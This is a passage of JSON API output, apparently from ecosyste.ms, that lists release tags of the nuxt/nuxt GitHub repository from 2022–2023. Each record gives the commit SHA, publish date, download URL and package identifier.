https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T